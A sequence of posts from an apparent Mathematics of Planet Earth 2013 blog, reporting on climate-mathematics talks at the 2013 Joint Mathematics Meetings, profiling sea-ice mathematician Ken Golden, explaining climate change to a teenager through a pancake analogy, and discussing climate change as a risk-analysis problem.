    The main goal of the Symposium is to serve as a forum for presentation of ongoing research on the mathematics of population. The program will encompass research on human and non-human populations, and both theoretical and applied research. In bringing together mathematical demographers and population biologists, the symposium will adhere to Keyfitz’s view that population itself is an object worthy of study, not limited to particular species.

    Tony Nance
    Mathematical Biosciences Institute
    tony@mbi.osu.edu

    Posted in General, Public Event, Social Systems | Leave a comment

    From the JMM — Conceptual Climate Models Short Course

    Would you like to learn about conceptual climate models and teach them to your differential equations and modeling classes? Check out the online materials from the MAA Conceptual Climate Models Short Course at the JMM. The course was developed by a team from the Mathematics and Climate Research Network (MCRN) led by postdoc Esther Widiasih. There are recorded lectures, PDF slides and a 37-page workbook of sample exercises.

    The course was 50% lectures and 50% hands on sessions. The lectures by Hans Kaper introduce global and zonal energy balance models (EBMs), demonstrating how accessible the material is for undergraduates, and including ideas of bistability and bifurcation to a Snowball state. The lecture by Dick McGehee extends the one-dimensional (zonal) EBM to include a dynamic iceline, then explores how well the EBM explains glacial cycles and other features of the paleoclimate record when forced by Milankovitch cycles in Earth’s orbit. The lecture by Esther Widiasih discusses ways to incorporate the effect of CO${}_2$ in the EBM, and related open questions.

    Anna Barry and Esther Widiasih helping participants during a hands-on session.

    Samantha Oestreicher helping a participant during a hands-on session.

    The hands-on sessions, designed to build on each lecture, were run by Esther Widiasih, Anna Barry, Samantha Oestreicher and Dick McGehee. The worksheets include theoretical and computational exercises to develop intuition for the basic EBMs, together with simulations of the EBMs to explore the interplay between energy balance, ice-albedo feedback, Milankovitch cycles in Earth’s orbit, greenhouse gases and other feedback mechanisms. While the exercises are written to be software independent, a MATLAB guide is provided for each worksheet. Some of the participants volunteered to create similar guides using Mathematica and SAGE, so they will be coming to the website soon.

    We hope you’ll join us in continuing to beta-test the materials, and that you will send us suggestions for improvements and additions, and tell us about our typos! You can send feedback to info@mathclimate.org.

    Posted in Climate Modeling, Conference Report | 1 Comment

    From the JMM — Porter Lecture by Prof. Ken Golden

    On the closing afternoon of the Joint Meetings of the AMS and the MAA in San Diego, the attendees were treated to a fascinating talk by Kenneth Golden (from the University of Utah), who gave this year’s Gerald and Judith Porter Public Lecture, entitled “Mathematics and the melting polar ice caps”.

    Ken was introduced by MAA president Paul Zorn, who explained that the Porter Public Lectures really were intended for the public, not just mathematicians, and he told us a little about Ken’s long fascination with and fundamental work on the polar ice, not based only on theoretical mathematics but important experiments that have taken him on expeditions to the Earth’s polar regions 15 times now, often accompanied by students, both graduate and undergraduate, who gain practical, life-changing experience as well as mathematical knowledge.

    Paul mentioned that Ken had been the subject of an article yesterday in the San Diego Union Tribune, where the reported had compared Ken to “Indiana Jones”, and obligingly, that film’s theme music heralded Ken’s appearance on the podium, which drew a chuckle from the audience.

    Ken started by stating that, yes, our climate is changing, and that, probably, the most dramatic changes are taking place at the poles. He reminded the audience of the evidence based on the satellite data from 1979 to 2000 showing how the Arctic sea ice summer minimum had fallen dramatically below the average sea ice minimum during that period, but he pointed out something evident from the data that most of us didn’t know: The observed decreases in the minimum Arctic sea ice were very much greater than what all of the accepted models predicted, which showed that something was missing in the current models.

    Ken pointed out that it wasn’t just polar bears and walruses that care about sea ice, but oil companies and, eventually all of us. After all, the cryosphere (the part of the Earth’s surface that is covered with ice) makes up 7-10% of the surface of the Earth, and anything that affects it is very likely to affect the rest of the planet in a series of ripple effects that could induce dramatic changes in the climate of the whole Earth. For example, having much of the sea ice melt increases the danger that the land ice sheets over Greenland and Antarctica will also experience significant melting, which would raise sea levels around the world. As Ken said, sea ice is not just an indicator, it’s a major player in governing the world’s climate.

    Ken then introduced his major mathematical themes visually by exhibiting photographs of sea ice at a wide range of scales, from sub-millimeter to more than 100 kilometers, pointing out that sea ice, far from being a homogeneous medium, has complicated structures at all scales, and understanding how these interact and induce macroscopic properties that can be incorporated into global-scale climate models is a fundamental challenge that has been the focus of his work and that of his students.

    His point was that, while, at first glance, sea ice looks like a barren, frozen, impermeable cap, it’s really a complex, porous composite material, whose structure is strongly affected by the amount of brine (i.e., salt) in the ice, which causes the formation of micro-brine channels that support percolation effects and generate an astonishing array of phenomena, interacting strongly not only with physical processes but biological processes as well. For example, salt water transport brings nutrients into the ice to feed the algae, which feed the krill, which feed the whales, and so on.

    The main part of the talk that followed explored how mathematical concepts such as percolation theory, composite materials, fractals, statistical physics, and multi-scale homogenization (a set of techniques for approximating complicated local composite structures by more homogeneous models that can help incorporate some of properties generated by the local structures into models at higher scales) have entered into his work and allowed him to make discoveries that have greatly expanded our ability to model what is happening to the sea ice in the polar regions.

    As exciting as it was to see how formerly exotic and abstract concepts such as fractal dimensions enter into these practical models, an equally exciting part of the story was Ken’s experimental work, which had taken him on polar expeditions a total of 15 times so far, had given him a chance to do very fundamental experiments, and had also allowed him to engage undergraduates and graduate students in fundamental research. He told some great stories about his students in Utah who had become intrigued with his work and wound up doing creative, original work AND had had the chance to go on polar expeditions as well.

    Another of his main themes was that the power of mathematics was in its cross-pollination of different areas, that concepts developed in one area turn out to have applications in many other areas, and he convincingly demonstrated this by giving many examples that had come up in his research.

    Ken finished by premiering a truly entertaining and informative video of his most recent polar expedition, his 15th, to study sea ice around Antarctica, at the end of which he was roundly applauded.

    The audience left with a deep appreciation, not only of the importance of understanding the challenges that climate change poses for us, nor even just that mathematics has a crucial role to play, but for the power of enthusiasm and dedication to teaching and research to make a difference in people’s lives.

    Robert L. Bryant, Director
    Mathematical Sciences Research Institute
    17 Gauss Way
    Berkeley, CA 94720-5070
    MSRI
    bryant@msri.org

    Posted in Cryosphere, General, Public Event | 2 Comments

    Mathematician stepping on thin ice

    From the U~T San Diego, Saturday January 12, 2013

    With a resume of scientific discoveries, and a track record of harrowing Antarctic adventures, University of Utah mathematician Ken Golden has stepped out of the ivory tower and onto thin ice.

    Golden, a speaker at this week’s national mathematics conference at the San Diego Convention Center, will give a lecture today on polar ice, a topic that has led him to the ends of the earth, and just barely back again. Over the past three decades, he’s traveled on seven voyages to Antarctica and eight to the Arctic, applying his expertise in theoretical mathematics and composite materials to questions about brine inclusions in sea ice, and the role of surface “melt ponds” on the rate of ice loss.

    “Our mathematical results on how fluid flows through sea ice are currently being used in climate models of sea ice,” he said.
    Along the way he retraced the route of the ill-fated 1914 Shackleton expedition, survived a ship fire after an engine explosion, and spent two weeks stranded on an iced-in vessel last fall. To Golden, the thrill of discovery outweighed the dangers of polar travel.
    “It’s like a different planet,” he said. “It’s one of the most fascinating places on earth. It’s one thing to sit in your office and prove theorems about a complicated system. It’s another thing to go down there yourself. It informs my mathematics.”

    As a kind of mathematical Indiana Jones, Golden has achieved a rock star status rare among academics. The prestigious research journal Science ran a profile of Golden in 2009. Fans lined up for autographs at the conference this week, and are expected to fill his lecture: one of two public events at the mostly technical conference. “Never in my wildest dreams did I imagine I’d be a math professor signing autographs,” Golden said.

    Golden first traveled to Antarctica during his senior year in college, along the Drake Passage, a route that Irish explorer Ernest Shackleton pioneered in 1914, after his ship was crushed by sea ice. Shackleton made the rescue trek in an open boat, but Golden said the journey was gut-wrenching even on a modern ship. “I have very vivid memories of crossing the Drake Passage, one of the stormiest seas in the world, and taking 50-degree rolls,” he said.

    Golden earned a PhD in mathematics at New York University, and landed in a professorship at the University of Utah, before returning to the realm of ice. He nearly relived Shackleton’s plight on his subsequent voyage in 1998 after the ship’s engine was destroyed in a fire. Crews sounded the emergency alarm, and then announced they were lowering the lifeboats, Golden said. “It’s not what you want to hear when you’re in the Antarctic ice pack,” he said. After five days on the ice, crews jury-rigged a backup engine and the vessel limped home, he said.

    Not dissuaded by the mishap, Golden joined subsequent expeditions to the poles, during which he described breakthroughs in ice equations.
    Standing on the ice during a howling Arctic storm one night, he noticed the ground around him turning to slush, and realized “in one particular epiphany,” that that the ice was reaching a percolation threshold, through which brine could flow through freely.
    His research on the phenomenon led to his “rule of fives,” which describes the combination of temperature, salinity and saturation at which ice becomes permeable, and helps explain how ice sheets grow.

    Golden’s other studies examine the role of “melt pools” in ice, which allow ice to melt faster by reducing the heat reflected.
    “Sea ice goes from pure white snow, to a complex, evolving mosaic of ice, snow and meltwater,” Golden said.
    Studying that phenomenon can quantify the overall reflectiveness of the sea ice pack, he said, helping close some gaps in current ice melt models.

    “Mathematics is normally rather esoteric, but Ken’s work is very applied, and it’s applied to the topic of sea ice, which is of great interest today due to climate change,” said his colleague, Ian Eisenman, a professor of climate science and physical oceanography at Scripps Institution of Oceanography. “I think his work in general is very exciting not only for fellow scientists, but also for the general public.”

    Posted in Conference Report, Cryosphere, General, Public Event | 3 Comments

    From the JMM — A Meteorologist’s View

    I am attending the Joint Mathematics Meetings in San Diego, where I was convinced to help organize a special session on environmental mathematics focused on evaluating past climate changes and modeling of future variations. I am a meteorologist by training and a climate scientist by virtue of spending the past 35 years doing research in observing and understanding of climate variability. (This may surprise people from CICS and ESSIC, who know me almost solely as a manager, but I still think of myself as a scientist!) I have been intrigued by the differences between this meeting and the other large national meetings that I generally attend – the Fall meeting of the American Geophysical Union in San Francisco and the Annual Meeting of the American Meteorological Society, which is always in mid-winter, and in various southern or west coast cities, Austin Texas this year.

    AGU is known for quick turnaround talks, generally 15 minutes. AGU was the first of these big meetings to place computers in every room and to manage presentations centrally – authors bring their memory sticks to the speaker ready room, upload the presentations onto servers, check them, and when the time comes for the session everything is ready. AGU also schedules sessions so that cherry picking of interesting talks in different rooms is possible (not easy, but possible). The AMetSoc meetings have adopted the same centralized system for handling presentations, and similar scheduling. The Joint Mathematics Meetings organizers don’t seem to have made that transition just yet, and so the first of our two sessions, held on Thursday morning, was a bit like going back in time – we used the personal MacBook of one of the organizers, with the power cord of one of the others. Each talk was uploaded either before the session began (at 8:00am) or between talks. The most entertaining part was adjusting the size of the projected version of the first speakers talk – he began by living with the outer edges of his slides being cut off, but eventually we needed to solve the issue. As usual, one of the younger audience members was the problem solver – it had something to do with “mirroring” in PowerPoint.

    The session went very well, once the technical issues were straightened out. Several presentations dealt with the fine details of how small scale processes are handled in climate models. In most cases, the speakers went into mathematical detail that escaped me, but all were very convincing, and the 30 minute time slots made for a more enjoyable pace in my opinion. I particularly enjoyed the last two talks, which focused on aspects of large-scale climate. Prof. Langford from the University of Guelph in Ontario described a simple model of Hadley Cell variations, relating it both to current events and to the climate of tens of millions of years ago. Prof. Boos from Yale University discussed monsoon circulations and their relationship to nearby desert regions. These two talks were the most interesting to me personally, but all of the presentations would have been well received in either AGU or the other AMS. The second part of our special session will be Saturday morning, also beginning at 8am.

    Phillip Arkin, Director
    Cooperative Institute for Climate and Satellites (CICS)
    Earth System Science Interdisciplinary Center (ESSIC)
    University of Maryland
    parkin@essic.umd.edu

    Posted in Conference Report, General | Leave a comment

    Dear my imaginary teenage sister,

    I was thrilled to get your last letter. I’m glad to see you are looking at some of the references I sent you last time. Figuring out who is responsible for higher atmospheric levels and how to respond to climate change can be difficult. First, let’s talk about where the carbon is coming from.

    Some of my mathematical research is to try to prove that we need to stop adding carbon to the atmosphere so I have a couple specific ideas for you to think about. One of the pieces of evidence I study is the Keeling curve, which is the upward curve of measured carbon in the atmosphere. The measurements are taken in Hawaii. (pretty sweet location, right?) Well, scientists and mathematicians have actually figured out that we can determine where the carbon was released despite the location of the measurements [1]. So we can conclusively know which area of the world added the carbon to the atmosphere. The kicker is that most of the carbon is from industrialized nations like the U.S.A. and China. In 2000, the USA added more carbon to the atmosphere than every other country on earth. I’ve attached a clever map I found of the world where each country is scaled based on that county’s carbon emissions in 2000 [2].

    See how big the U.S.A. is? As Americans, I think it’s our responsibility to fix some of what we caused. Sadly, my research alone will not solve the problem of global warming. But there are lots of real things that anyone can do to decrease the amount of salt they add to the batter.

    So, to answer your second question: Yes! There are lots of ways that you can help. The IPCC reports that lifestyle choices “can contribute to climate change mitigation across all sectors” by decreasing GHG emissions [3]. There are these two guys, Robert Socolow and Stephen Pacala who present 15 ways to reduce GHG, any 7 of which would hold the carbon emissions constant [4]. They are things like: decreasing the amount of energy you use in our home by 25% or using more wind power. Stuff our society already knows how to use. You might try to convince your school to recycle more, put up solar panels or to use energy efficient air conditioners the next time they remodel. You could also drive less…

    So I agree with your idol, Miley Cyrus when she says we need to “wake up America” [5]. I think we need to start passing laws and legislation to decrease the amount of greenhouse gasses we are emitting and put money into developing new greener technology. We are putting too much carbon in the atmosphere and the scientists aren’t sure what’s going to happen. We don’t know how much carbon is too much and we don’t have a good way to pull it back out of the atmosphere. (Remember the salty pancake analogy from my last letter?) Thus, we, as a society, need to put some serious thought into the problem. The good news is there are actions you can take that we already know will help.

    Love, Samantha

    Samantha Oestreicher
    oestr042@umn.edu

    PS- As always, if you have any more questions, then please send them my way.

    [1] Buermann, Wolfgang, Benjamin Lintner, Charles Koven, Alon Angert, Compton Tucker, and Inez Fung, “The changing carbon cycle at Mauna Loa Observatory” PNAS, vol 104, no 11.www.pnas.org/cgi/doi/10.1073/pnas.0611224104 March 13, 2007.
    [2] SASI Group and Mark Newman, “Map 295” U. of Michigan and U of Sheffield.www.worldmapper.org 2006.
    [3] Soloman et al. “Summary for Policymakers”, IPCC, Fourth Assessment Report, Workgroup 3, 2007, pg 12.
    [4] Socolow, Robert and Stephan Pacala, “A plan to keep carbon in check” Scientific American, Sept 2006
    [5] Cyrus, Miley. “Wake up America.” Lyrics. Breakout. Hollywood Records, 2008.

    Posted in Climate, General | Leave a comment

    From the JMM — A view from the other AMS (Am. Meteorological Soc.)

    In January I am normally in a southern US city attending the American Meteorological Society annual meeting. This week, I am in San Diego attending a different AMS – the American Mathematical Society Joint Mathematics Meetings. I am helping to organize a special session on environmental mathematics during which mathematicians and environmental scientists describe methods for modeling and observing climate. Our session is a part of Mathematics of Planet Earth 2013 (MPE2013), a joint effort of more than 100 scientific societies, universities, research institutes, and organizations all over the world. A number of sessions and invited addresses at this meeting are devoted to the topic.

    While the attendance here seems large, it is very unlike the other AMS for me in that I know few of the attendees and so I find it easy to sit in on sessions and actually pay attention to the content. This morning I listened to several talks on integrating the mathematics of planet earth into college mathematics curricula. I came away with the impression that the large amount of data and analyses available make climate an outstanding virtual laboratory for introducing their students to the use of mathematics in the “wild”. I was impressed with the wide range of topics and tools that these faculty members were introducing their undergraduate students to. In one case, students were expected to learn and use MATLAB (something I have been unable to do myself, sadly), and by the end of the course to run experiments using the Weather Research and Forecasting (WRF) model.

    Emily Shuckburgh of the British Antarctic Survey presented an invited address on “Using mathematics to better understand the Earth’s climate”. She began with a pretty elementary tutorial on the factors that control the Earth’s surface temperature, showing how fairly simple math can provide insight into factors that lead to changes in climate and how feedbacks get involved. She moved on to describe atmospheric and oceanic modeling and the role of eddies, which seems to be a particular focus of her research, and tied that to field work she has participated in in the Southern Ocean and Antarctica.

    Tomorrow morning is the first of the two parts of our special session, and since one of our speakers was unable to come I need to prepare something to fill that gap. I will try to report again tomorrow on our session and other interesting events.

    Phillip Arkin, Director
    Cooperative Institute for Climate and Satellites (CICS)
    Earth System Science Interdisciplinary Center (ESSIC)
    University of Maryland
    parkin@essic.umd.edu

    Posted in Conference Report, General | Leave a comment

    From the JMM — Dr. Emily Shuckburgh’s Invited Address

    Dr. Emily Shuckburgh, the leader of the Open Oceans research group in the British Antarctic Survey, gave a terrific talk on the mathematics of climate science here in San Diego on the opening day (January 9) of the Joint Mathematics Meetings of the American Mathematics Society and the Mathematical Association of America.

    Emily’s talk was entitled “Using mathematics to better understand the Earth’s climate.” She was introduced by Christiane Rousseau, who gave us a great preview of the other MPE2013 activities still to come at the JMM. (You can see the full list here.)

    One of Emily’s main points was that basic physics and simple mathematical models go a long way towards explaining the Earth’s overall surface temperature, but that more sophisticated concepts from dynamical systems and differential equations are important in modeling the finer features that we need to understand in order to get a picture of the changing climate. Her other main point, just as important, was that mathematics alone is not enough; you have to have a good understanding of the underlying physics of the Earth’s climate system to help you understand what is important to model.

    She started with the 1827 work of Fourier, whose simplest model of the Sun-Earth system, ignoring the atmosphere and just using black body radiation and Stefan-Boltzmann, predicts an average temperature of 255 kelvin ($-18^{\,\mathrm{o}\,}$ C), whereas the actual observed temperature is about 288 kelvin ($15^{\,\mathrm{o}}$ C). (One kelvin (K) equals one degree Celsius (${}^{\,\mathrm{o}}$ C).) She then put in a simple model for the atmosphere’s transmission and absorption of radiation (ignoring convection) and showed that the prediction becomes 286 kelvin, which is remarkably close to the observations for such a simple model. Of course, two degrees on a planetary scale is still quite significant for us humans trying to live on Earth!

    Emily went on to point out that the calculations were based on the known absorption/radiation characteristics of the atmosphere, which would change if the composition of the atmosphere changed, in particular, if the percentage of carbon dioxide in the atmosphere were to change. She showed us how sensitive the Earth’s climate is to this by giving us a short tour of what is known about the historical correlation between the carbon in the atmosphere and the Earth’s average temperature, a history based on ice cores that cover the past 800,000 years. This bore out the the model’s effectiveness and showed how robust the calculations are while, at the same time, pointed out how important it is to know the level of greenhouse gases in the atmosphere.

    She pointed out that the correlation doesn’t say anything about causation, because, while increasing the carbon in the atmosphere would increase the predicted temperature, increasing the temperature would, according to our models, most likely increase the amount of carbon in the atmosphere.

    To understand the dynamics, it’s very important to understand how heat is transported around on the Earth’s surface, particularly from the equator to the poles. (After all, there’s a lot of ice at the poles, but moving a lot of heat there is likely to cause dramatic melting.) So Emily then went on to describe the models of this transport, using basic Navier-Stokes models, first for the atmosphere and then for the oceans.

    This is where her presentation became even more interesting. Even for the ‘simpler’ atmosphere problem, the rotation of the Earth causes instabilities to form in the solutions to the fluid convection equations, leading to such phenomena as the jet streams and the boundary instabilities that she described as ‘eddies’ (aka ‘swirly patterns’, roughly about 1000km in size) that can drive heat flux and help transport heat from the equator to the poles. She then described the eddies in the ocean system (which are much smaller, around 25km in size, but still very important for a good model); this is a much greater challenge, because numerically, you have to have a much, much finer grid to get the necessary resolution.

    The dynamical systems that then show up, both in models and in observation become very interesting. Of course, no one can solve them explicitly, but known dynamical features such as KAM tori do show up and form barriers to mixing, so there’s the challenge of understanding the interaction of the regimes of strong and weak mixing. It was amazing and illuminating to see how these basic ideas from dynamical systems come into play in understanding the models and in motivating the scientific observations that need to be made in order to improve our models.

    Emily went on to describe some of her own theoretical and observational work in developing and testing models of how the ocean currents, particularly around Antarctica, are distributing heat and what some of the likely effects will be on a warming planet.

    She concluded with some sobering statistics of what might happen to our climate if the atmospheric carbon continues to rise, and pointed out that we are NOT on track to rein in the human contribution to atmospheric carbon, so we are potentially on the verge of climate regimes that we have not seen in human history, so there is a serious potential for rapid and dangerous climate change.

    At the conclusion of this exciting talk, the audience showed its appreciation by giving her a rather long ovation, and we all left with a much better understanding of the mathematical and political/social challenges we face.

    Robert L. Bryant, Director
    Mathematical Sciences Research Institute
    17 Gauss Way
    Berkeley, CA 94720-5070
    MSRI
    bryant@msri.org

    Posted in Climate, General, Public Event | 1 Comment

    US Launch of MPE2013 today at JMM!

    Today is the official US launch of Mathematics of Planet Earth 2013 at the Joint Mathematics Meeting, with a special celebration at the Open House of the Institutes this Wednesday at 5:30 p.m. It is an excellent opportunity to recall the North-American origin of MPE2013. Here, we all share the passion of mathematics. Most probably, we also share passion for nature and our planet. MPE2013 is an opportunity to put together our two passions.

    I had the idea of MPE2013 in 2009, a dream, on a long training day on my cross-country skis that left me plenty of time to sketch its main characteristics: an extremely broad and important theme, an exceptional opportunity of collaboration between mathematicians and researchers from other scientific disciplines, a great theme for outreach to the public and the schools. The next Monday, I shared the idea with the directors of the Canadian institutes and we immediately wrote a one-page draft of the project. By the end of the week, the draft was sent to the directors of the North-American institutes. A few minutes later, at 6:00 a.m. Berkeley time, the first answer from MSRI arrived and, by the end of the day, nine American institutes had agreed to go. It was then time for hard work. So I use this opportunity to thank all my American colleagues who have worked so hard for MPE2013, especially Brian Conrey, Director of American Institute of Mathematics, and Mary Lou Zeeman from Bowdoin College.

    In 2010, I was asked information about MPE2013 by David Wallace, Director of the Isaac Newton Institute (UK) and by Cédric Villani, Director of the Institut Henri–Poincaré (Paris). We immediately decided to open the initiative to the world. MPE2013 was announced at the General Assembly of the International Mathematical Union in Bangalore in 2010, and at the meeting of the Institutes’ Directors at ICM 2010.

    American Institute of Mathematics (AIM) was instrumental in giving a great impulse to MPE2013 by bringing people together for two organizational workshops in Palo Alto in March 2011 and March 2012. The first workshop was concentrated on the planning of long-term programs and workshops, while the second workshop included the planning of meetings and outreach activities.

    The 2013 Joint Mathematics Meeting will start brilliantly with a plenary lecture by Emily Shuckburgh and end, not less brilliantly, with the Porter Lecture by Ken Golden. Both Emily and Ken incorporate field work in their research and spent significant periods of time in Antarctica. Have you already learned that the structure of sea ice is very different from that of regular ice? Ken is a specialist of sea ice. He spent the fall of 2012 in Antarctica, studying ice and what we can learn from it.

    My dream is now shared with so many people that MPE is developing on its own. Since the international launch on December 7 2012, no less than 20 new partners have joined. In parallel to the MPE blog chaired by Hans Kaper, a French blog with MPE nuggets has started on January 1st. The spirit of MPE2013, including the exceptional collaboration at the world level is here to last.

    Christiane Rousseau, International Coordinator of MPE2013

    Posted in General, Public Event | Leave a comment

    Dear my little (well not so little anymore!) imaginary teenage sister,

    Doing your school research paper on climate change sounds like a great idea! Let me see if I can get you started. I’ll even put a few references at the end in case you want to look those up for your school report. (hint hint!)

    First, I totally agree, popular culture is becoming inundated with the buzz words, “green”, “ecofriendly”, and “global warming”, but I’m not sure society is explaining things to you very well. You have some really good questions about what global warming means. Even your pop idol, Miley Cyrus is singing “Everything I read is global warming, going green, I don’t know what all this means…” [1]. And if she doesn’t get it, then why should the adults expect you to understand? The truth is, no one really knows all the answers about the problem. The climate is really complicated and scientists don’t always get things right the first try. It takes them a little while to figure something out, just like it takes you a little while to learn something new. (Remember all those cooking failures when you were young?) But we do know a LOT about climate change. And we do know that something needs to change or we may be in some serious trouble.

    Okay, let’s talk about scientist lingo. The scientists who wrote the IPCC (or Intergovernmental Panel on Climate Change) say, “A global assessment of data since 1970 has shown it is likely that anthropogenic warming has had a discernible influence on many physical and biological systems” [2]. So, what does that mean? The report is saying that it’s likely that humans are affecting the world around us. There is even a note that clarifies: ‘Likely’ means 66-90%. So we may -or may not- be affecting the global climate. Well, if that isn’t vague I don’t know what is! But, maybe, just maybe, the statement has to be vague. There were “more than 2500 scientific expert reviewers, more than 800 contributing authors, and more than 450 lead authors” who worked on writing the IPCC report [3]. Okay, so you know how you and I can’t always agree? We are only 2 people. Now, imagine trying to get 800+ people to all agree on the same thing. It would be impossible! All of a sudden that range of 66-90% is looking a little more reasonable. No matter what, all the scientists think it’s more than 50% likely that we, humans, are changing the climate. We are affecting our planet. (Well, there are people who think climate change is not our fault- but if a person can’t believe 800 of the top scientists who all agree, then do we really want to believe them?) The real problem that we should be worrying about is that we don’t know what’s going to happen to Earth under our influence. This is what the scientists are currently arguing about. What can we expect from the climate? What should we do?

    Now, imagine you are making pancakes. (It sounds random but just trust me for a minute, okay?) If you add too much salt, then your pancakes start to taste funny. But a couple extra grains aren’t going to make a difference. However, there is some critical mass of salt which ruins the pancakes. And you can’t just take the salt out once it’s mixed up! The pancakes are ruined and you have to start over. This is what we are doing to our atmosphere. Only, we are adding extra carbon and other GHGs (greenhouse gases) to the mix instead of salt. In our atmosphere carbon is measured in parts per million, or ppm, instead of teaspoons.

    So how much salt in supposed to be in our climate pancakes? Pre-industrial levels of carbon were around 275 ppm. This is going to be our baseline recipe value. We know from this cool science which uses really old ice that Earth has had atmospheric carbon values between 180-280 ppm for the last 800,000 years. We also know that global temperature is closely correlated to carbon levels [4]. The scientists from the IPCC think it’s “very likely” that GHGs, including carbon, are the cause of global warming (very likely means 90-99%) [5]. We now have 400 ppm instead of the baseline of 275 ppm! Our batter is getting pretty salty. Eww! Salty enough that the scientists are starting to wish we could throw it out and start over. But we only have one planet and one atmosphere. We can’t throw it out and start over. How much more salt are we willing to dump in our mixing bowl and still eat the pancakes?

    Love, Samantha

    Samantha Oestreicher
    oestr042@umn.edu

    PS- Let me know if you have any further questions I can help with!

    [1] Cyrus, Miley. “Wake up America.” Lyrics. Breakout. Hollywood Records, 2008.
    [2] Soloman et al. “Summary for Policymakers”, IPCC, Fourth Assessment Report, Workgroup 2, 2007, pg 9.
    [3] Press Flyer announcing IPPC AR4; http://www.ipcc.ch/pdf/press-ar4/ipcc-flyer-low.pdf
    [4] Soloman et al. “Summary for Policymakers”, IPCC, Fourth Assessment Report, Workgroup 1, 2007, pg 3.
    [5] Soloman et al. “Technical Summary”, IPCC, Fourth Assessment Report, Workgroup 1, 2007, pg 24.

    Posted in Climate, General | 1 Comment

    Global Warming, Climate Change, Climate Research

    It is often the case that at the end of one of my talks about some aspect of climate research or about the development of tools for the analysis of climate I get asked questions regarding global warming. Whether global warming is “happening” or whether the claims on either side of the issue are true or false. Or more to the point, I am asked whether we should or should not be concerned about warming. I know full well that my answers to this line of questioning is never satisfying; sometimes this is purposely so. I do have something to say about global warming and global change, but it is nothing more than a personal opinion. That of a concerned citizen, rather than of an expert on this issue.

    I have taken the time and the effort to examine the data used by others to demonstrate a global warming trend, I understand how this data has been processed and what are the challenges involved in making the analyses. The upshot is that I have not seen any data or analysis that demonstrates that warming is not occurring. Like the myriad of people who work in global climate trends, I also see a very significant correlation between human activities and warming that make the industrial-era warming trend unlike any other change in climate before then. Further, I have not seen any reason to conclude that the best and most authoritative scientists working on global warming trends would not readily modify their conclusions if they were presented with data that shows a different picture of what’s happening.

    The idea that climatologists and the governments that fund them have a self interest in promulgating global warming is so childish and yet so amazingly distracting to even thoughtful people: besides the fact that not all climatologists are climate change experts, ”climate” is a natural phenomenon, whether it is warming or not, and thus climate scientists will always have something to study. If anyone has a self interest in what climate does, however, it is those whose livelihood is affected by the state of climate itself, the groups from where most of the people who use this line of thinking come from. This is not a laughing matter: half a century of opposition to anything nuclear has had the effect of seriously slowing down research into the safe use of nuclear energy sources. I was not keen on how the nuclear industry does its business, but to nearly kill nuclear research was a terrible thing: we lost precious time in finding ways to safely use the stuff.

    So what’s the fuss over a little bit of warming? If you live in the South West of the US, as I do, you are familiar with pre-Columbian communities that disappeared because of sudden drought, or post-Columbian communities that were wiped out not by war but by the rapid introduction of new diseases.

    The main reason I cannot give you more than a personal opinion on the implications of global warming is that it is a risk analysis problem and this is not within the range of my expertise, not by a mile: sure, the more we know about climate dynamics, the more informed any risk analysis decision is. But that I know a little bit of probability theory and a little bit of climate dynamics is not adequate, just as someone who might know something about probability and know how to design cars will be poorly equipped to design liability insurance instruments.

    There are parallels with the risk analysis problem associated with cigarette smoking: in the climate problem there is compelling correlation between human activities and global warming. There is a compelling correlation between cigarette smoking and some forms of cancer; but to date, no one knows exactly how cigarettes cause cancer. The causation relation between human activities (burning hydrocarbons, among other things) and global warming is not fully understood either. Decisions need to be made now (we cannot wait to know everything on climate). In the cigarette case, actions were taken to curb smoking, because the risk analysis made it clear that it was better to curb smoking than not. No one waited for the causation mechanism to be fully elucidated.

    The cigarette risk analysis is not a perfect analogue to the climate change risk analysis problem: once you remove cigarettes, you remove the problem of cigarettes and cancer. On the other hand, climate will and does change, whether it is due to human activities or not. Climate change can have huge impact on some or many of us. Natural or man-made, some of the people who stand to loose a lot from the change are those very people who rely extraordinarily on cheap amounts of energy to make it through a change that can have monumental effects on society and the economy.

    To characterize this problem as non-existent is stupid. But to think that it is just a bit more complicated than what we need to do to keep the Mississippi river flowing in the same place, always, is at best, irresponsible. Aside from being one of the most complex risk analysis problems ever, it’s not clear what should be done or could be done to reduce the impact of climate change. It is perfectly valid to ask, as some climate change debaters do, whether putting in the (presumed) huge resources to tackling climate change right now would be better spent on wiping out hunger or ravaging diseases, for example.

    No one really knows what could be done to weather or climate change. Some scenarios include climate engineering. Climate engineering gives some people the shivers, since it requires us to know a lot about climate (I think far more than we know at present), but research in it should be pursued. Virtually every risk analysis scenario involves two aspects of human activity: energy use and population growth. Both issues are correlated with warming and go beyond climate change. Did I also mention that some of it is unpalatable, if you are the country that uses about one quarter of all energy worldwide, or if you are a developing nation, or if you are neither but your country is slowly disappearing under the waves and you have zero influence on the rest of humanity?

    The risk analysis folks don’t even have a good managed-risk plan, at present. What are the key challenges in climate dynamics that need to be handled in order to produce serious climate-change risk analysis strategies? You can mention obvious things: more data, the problem is that for a minimally 10^7 degree of freedom problem, there’s no expectation that we can circumvent using a Bayesian approach that combines models and data in some way. Significantly improved means on bounds on uncertainties and better means to obtain these. In models they need significantly more reliable ways to capture how local effects affect global ones and vice versa. They need faster ways of producing different climate scenarios. They need better and more complete notions of sensitivity analysis. But frankly, the most important thing is a better understanding of the physics of climate: a global climate model is nothing more than a compendium of dynamics that agree with our expectations of outcomes; there are no theorems in this business.This is how most science, outside of mathematics is done: via compelling evidence, not necessarily evidence beyond a shadow of doubt. Insight into climate is the key to understanding how to parameterize microscales, challenge the curse of dimensionality of the system, produce better data assimilation strategies, create better sensitivity tools.

    The writer is Professor in the Mathematics Department at The University of Arizona. He has been doing research in climate dynamics, ocean dynamics, sensitivity analysis, and data assimilation for about 20 years. He is also Professor of Physics and of Atmospheric Sciences at Arizona.


    Prof. Juan M. Restrepo
    Group Leader, Uncertainty Quantification Group

    Department of Mathematics
    Physics Department
    Atmospheric Sciences
    University of Arizona
    Tucson AZ 85721, U.S.A.

    Juan Restrepo

    Posted in Climate Change, Risk Analysis | Leave a comment

    Ecosystem Dynamics and Management

    A changing world raises great challenges since we need to take steps that either reduce the rate of global change or that manage resources in the face of global change. Both steps require making predictions, which requires theory. But the systems involved are truly complex, so the theory must use mathematics. Mathematics applied to ecology and other environmental sciences has a long history of successes, but  understanding the resilience of environmental systems in the face of global change presents substantial mathematical challenges that require novel approaches.

